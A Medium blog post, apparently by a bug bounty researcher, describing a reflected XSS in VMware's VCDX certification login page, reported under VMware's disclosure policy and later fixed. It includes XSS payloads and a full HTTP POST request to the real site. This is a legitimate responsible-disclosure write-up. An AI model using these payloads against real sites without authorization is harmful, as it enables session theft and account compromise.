VMware Official VCDX Reflected XSS

Honc
Honc
Nov 19, 2017 · 2 min read

I was browsing the HackerOne bug bounty Project.

I want to try to find the loophole of big Enterprise first! I choose VMware.

Before you begin, see if the VMware vulnerability policy has something to pay attention to, This is what you should pay attention to in participating in any loophole reward program.

After reading the VMware vulnerabilities policy, there is not much to be aware of (or accept those vulnerabilities or those who do not)

Only Note:

Image for post
Image for post

In the case of vulnerabilities found in third-party software components used in VMware products, please also notify VMware as described above.

Policy: https://www.vmware.com/support/policies/security_response

------------------------

Don’t talk much, we start looking for a loophole.

Because I was using VMware products, I was thinking that each product has a certification expert badge and so on, whether this has, curious to find this site

Image for post
Image for post

Liste:https://vcdx.vmware.com/

is a VMware certification expert!!

But there seems to be no place to register. Go to the login page

At first a lot of people will try SQL injection some statements, but I didn’t think too much! Because big companies will not have such a clear loophole exists, the existence of the words have been found out

Based on occupational diseases, I try to enter a XSS string “><img src=x Onerror:alert (1)/>

I use grab data to modify

POST /login HTTP/1.1

Host: vcdx.vmware.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate, br

Referer: https://vcdx.vmware.com/login

Cookie: connect.sid=s%3AwU84EnNnabqCyW98coEEFYTZLhYkitff.al1Ce9v8xNZNBnZIhvDJ8IDQzDHVDBXlgb8%2BxV%2By2gg

X-Forwarded-For: 8.8.8.8

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 75

redirectTo=&email=%22%3E%3Csvg%2Fonload%3Dalert%28domain%29%3E%22&password=

Result!!

Image for post
Image for post

Indeed request response XSS I’m sure this is a loophole

Timeline

  • 2017/02/13 08:46 Provide vulnerability details to VMware Security Team
  • 2017/02/14 11:35 Receive response from Vinay that inspection is in progress
  • 2017/03/25 02:09 Yes, it fixes
  • 2017/03/31 05:18 Tell me there will be VMware Swag memorabilia
Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store